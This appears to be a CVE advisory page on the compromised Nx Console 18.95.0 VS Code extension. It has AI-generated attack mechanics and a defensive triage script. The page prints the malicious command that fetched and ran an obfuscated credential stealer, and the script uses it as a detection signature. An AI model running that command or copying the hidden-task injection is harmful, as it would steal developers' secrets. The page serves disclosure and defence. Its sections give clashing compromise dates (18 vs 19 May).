CVE-2026-48027
Description
Nx Console is the user interface for Nx & Lerna. On 19 May 2026, a malicious version of Nx Console, 18.95.0, was published at 12:30 PM UTC and removed soon after at 12:48 PM UTC, leaving it available for ~18 minutes in Visual Studio Marketplace. For OpenVSX, the problem was detected later, and the compromised version was available from 12:33 UTC to 13:09 UTC (~36 minutes). Version 18.100.0 of Nx Console is not compromised and users may remediate by upgrading to that version.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Nx Console VS Code extension v18.95.0 was compromised for ~18 minutes, delivering a credential-stealing payload; upgrade to v18.100.0+ immediately.
Vulnerability
A malicious version of the Nx Console VS Code extension (nrwl.angular-console), version 18.95.0, was published to the Visual Studio Marketplace and OpenVSX on 2026-05-18. The extension automatically executed an obfuscated payload (498 KB) from a dangling commit in the official nrwl/nx repository as soon as a developer opened any workspace. The compromise originated from a stolen contributor's GitHub CLI OAuth token, which was exfiltrated seven days earlier via the TanStack supply-chain compromise [1][2][3].
Exploitation
The attacker used a stolen contributor token to publish the malicious extension. No additional user interaction was required beyond having auto-update enabled or manually installing 18.95.0. Within seconds of opening a workspace, the extension fetched and executed the payload, which was a multi-stage credential stealer and backdoor [1][2].
Impact
The payload harvested tokens and secrets from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, exfiltrating them over HTTPS, GitHub API, and DNS tunneling. It also installed a persistent Python backdoor on macOS using a LaunchAgent. Any system with 18.95.0 installed during the exposure window (2026-05-18 12:30–13:09 UTC) should be considered fully compromised [1][2][3].
Mitigation
Version 18.100.0 (and later 18.100.5) is safe. Users must upgrade immediately. If 18.95.0 was installed during the exposure window, treat the machine as compromised, rotate all credentials, and check for indicators of compromise (e.g., ~/.local/share/kitty/cat.py, ~/Library/LaunchAgents/com.user.kitty-monitor.plist). No workaround exists; the malicious version has been removed from all marketplaces [2][3].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- (no CPE)
- (no CPE), version range: = 18.95.0
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"A stolen contributor GitHub token was used to publish a malicious VS Code extension version (18.95.0) that fetches and executes an obfuscated credential-stealing payload from an orphan commit hidden in the official nrwl/nx repository."
Attack vector
An attacker used a stolen contributor GitHub token to publish nrwl.angular-console v18.95.0 to the VS Code Marketplace [ref_id=1]. Within seconds of a developer opening any workspace, the injected code in main.js runs a hidden VS Code Task that executes `npx -y github:nrwl/nx#558b09d7` [ref_id=1]. This fetches an orphan commit containing a 498 KB obfuscated JavaScript payload that self-daemonizes, harvests credentials from GitHub, npm, AWS, Vault, Kubernetes, 1Password, and the filesystem, then exfiltrates them over HTTPS, GitHub API, and DNS tunneling [ref_id=1]. The payload also installs a persistent Python backdoor on macOS using a GitHub Search API dead-drop for C2 [ref_id=1].
Affected code
The malicious extension v18.95.0 had 2,777 bytes of injected code at byte offset 7,703,700 in the minified main.js file [ref_id=1]. The injected code calls function Efn(td) from the extension's activate() entry point, which creates a hidden VS Code Task to fetch the payload from orphan commit 558b09d7 in the nrwl/nx repository [ref_id=1]. The orphan commit replaces the monorepo root with a package.json and a 498 KB obfuscated index.js payload [ref_id=1].
What the fix does
The Nx team removed the malicious v18.95.0 from the marketplace within 11 minutes of detection [ref_id=1]. Version 18.100.0 of Nx Console is not compromised and users should upgrade to that version [ref_id=1]. The root cause was a stolen contributor GitHub token scraped during a prior supply chain attack, which the advisory states was used to push an orphan commit and publish the malicious extension [ref_id=1]. No patch diff is available; the remediation is to avoid v18.95.0 entirely and upgrade to the safe v18.100.0 [ref_id=1].
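A host-side triage script for the findings in this record, added here as an example (it is not code from the advisory, from Nx, or from StepSecurity). It looks for the three artefacts the record names: a nrwl.angular-console 18.95.0 directory under the VS Code extensions folder, the `github:nrwl/nx#558b09d7` fetch command inside any Nx Console main.js (attack vector section), and the two IoC paths from the mitigation section. The extensions-directory layout `~/.vscode/extensions/<publisher>.<name>-<version>` and the assumption that the command string appears literally in main.js rather than encoded are mine, not the advisory's; `demo()` runs the same checks against a constructed fixture.

```python
"""Host triage for the CVE-2026-48027 Nx Console compromise.

Added example: not code from the advisory, Nx, or StepSecurity. It checks the
three things the record names: a nrwl.angular-console 18.95.0 directory under
the VS Code extensions folder, the payload-fetch command string inside any Nx
Console main.js, and the two IoC paths from the mitigation section. The
extensions-directory layout (~/.vscode/extensions/<publisher>.<name>-<version>)
and the literal presence of the command string are assumptions.
"""
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

EXTENSION_ID = "nrwl.angular-console"
COMPROMISED_VERSION = "18.95.0"
# Command the injected code runs via a hidden VS Code Task (attack-vector section).
# Assumption: it is present as a literal string; an encoded variant would be missed.
PAYLOAD_FETCH_SIGNATURE = b"github:nrwl/nx#558b09d7"
# IoC paths from the mitigation section, relative to the user's home directory.
IOC_PATHS = (
    ".local/share/kitty/cat.py",
    "Library/LaunchAgents/com.user.kitty-monitor.plist",
)
# '<publisher>.<name>-<semver>' with an optional platform suffix such as '-darwin-arm64'.
_EXT_DIR_RE = re.compile(r"([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)-(\d+\.\d+\.\d+)(?:-[A-Za-z0-9_-]+)?")


@dataclass
class TriageResult:
    compromised_extension_dirs: list[str] = field(default_factory=list)
    signature_hits: list[str] = field(default_factory=list)
    ioc_files_present: list[str] = field(default_factory=list)

    @property
    def compromised(self) -> bool:
        """Any single finding means: rotate credentials and rebuild the host."""
        return bool(self.compromised_extension_dirs or self.signature_hits or self.ioc_files_present)


def parse_extension_dirname(name: str) -> tuple[str, str] | None:
    """Return (extension id, version) for an installed-extension directory name, else None."""
    m = _EXT_DIR_RE.fullmatch(name)
    return (m.group(1), m.group(2)) if m else None


def triage(extensions_dir: Path, home: Path) -> TriageResult:
    result = TriageResult()
    if extensions_dir.is_dir():
        for entry in sorted(extensions_dir.iterdir()):
            parsed = parse_extension_dirname(entry.name)
            if parsed is None or parsed[0] != EXTENSION_ID:
                continue
            if parsed[1] == COMPROMISED_VERSION:
                result.compromised_extension_dirs.append(str(entry))
            # Scan every bundled main.js regardless of version label: a renamed
            # or repackaged build could still carry the injected task.
            for js in entry.rglob("main.js"):
                try:
                    if PAYLOAD_FETCH_SIGNATURE in js.read_bytes():
                        result.signature_hits.append(str(js))
                except OSError:
                    continue
    for rel in IOC_PATHS:
        path = home / rel
        if path.exists():
            result.ioc_files_present.append(str(path))
    return result


def demo() -> TriageResult:
    """Run triage against a constructed fixture (a stand-in, not a real install)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        ext = root / "extensions"
        bad = ext / "nrwl.angular-console-18.95.0" / "dist"
        bad.mkdir(parents=True)
        # Constructed stand-in for the minified main.js carrying the injected command.
        (bad / "main.js").write_bytes(b"...;Efn(td);...npx -y github:nrwl/nx#558b09d7...")
        good = ext / "nrwl.angular-console-18.100.0" / "dist"
        good.mkdir(parents=True)
        (good / "main.js").write_bytes(b"...clean build...")
        (ext / "ms-python.python-2024.4.1-darwin-arm64").mkdir()
        home = root / "home"
        (home / ".local/share/kitty").mkdir(parents=True)
        (home / ".local/share/kitty/cat.py").write_text("# constructed IoC stand-in\n")
        return triage(ext, home)


if __name__ == "__main__":
    real = triage(Path.home() / ".vscode/extensions", Path.home())
    print("COMPROMISED" if real.compromised else "no findings", real)
```

Run it as-is to check the current user's VS Code install; a result with any non-empty field should be treated exactly as the mitigation section says (rotate all credentials, treat the machine as compromised), since the absence of a finding only rules out the artefacts this record names, not a modified payload.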
Preconditions
- config: Victim must have Nx Console v18.95.0 installed from the VS Code Marketplace
- input: Victim must open any workspace in VS Code to trigger extension activation
- auth: Attacker must have obtained a contributor GitHub token with push access to nrwl/nx and VS Code Marketplace publishing credentials
- network: Network access required for the extension to fetch the orphan commit from GitHub and for payload exfiltration
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.stepsecurity.io/blog/nx-console-vs-code-extension-compromised (nvd: Exploit, Third Party Advisory)
- github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847w (nvd: Mitigation, Vendor Advisory)
- nx.dev/blog/nx-console-v18-95-0-postmortem (nvd: Vendor Advisory)
- github.com/nrwl/nx-console/issues/3139 (nvd: Issue Tracking)
- www.cisa.gov/known-exploited-vulnerabilities-catalog (nvd: US Government Resource)
News mentions
- GitHub Breach Traced to Malicious 'Nx Console' VS Code Extension (Infosecurity Magazine, May 21, 2026)
- CISA Adds Three Known Exploited Vulnerabilities to Catalog (CISA Alerts)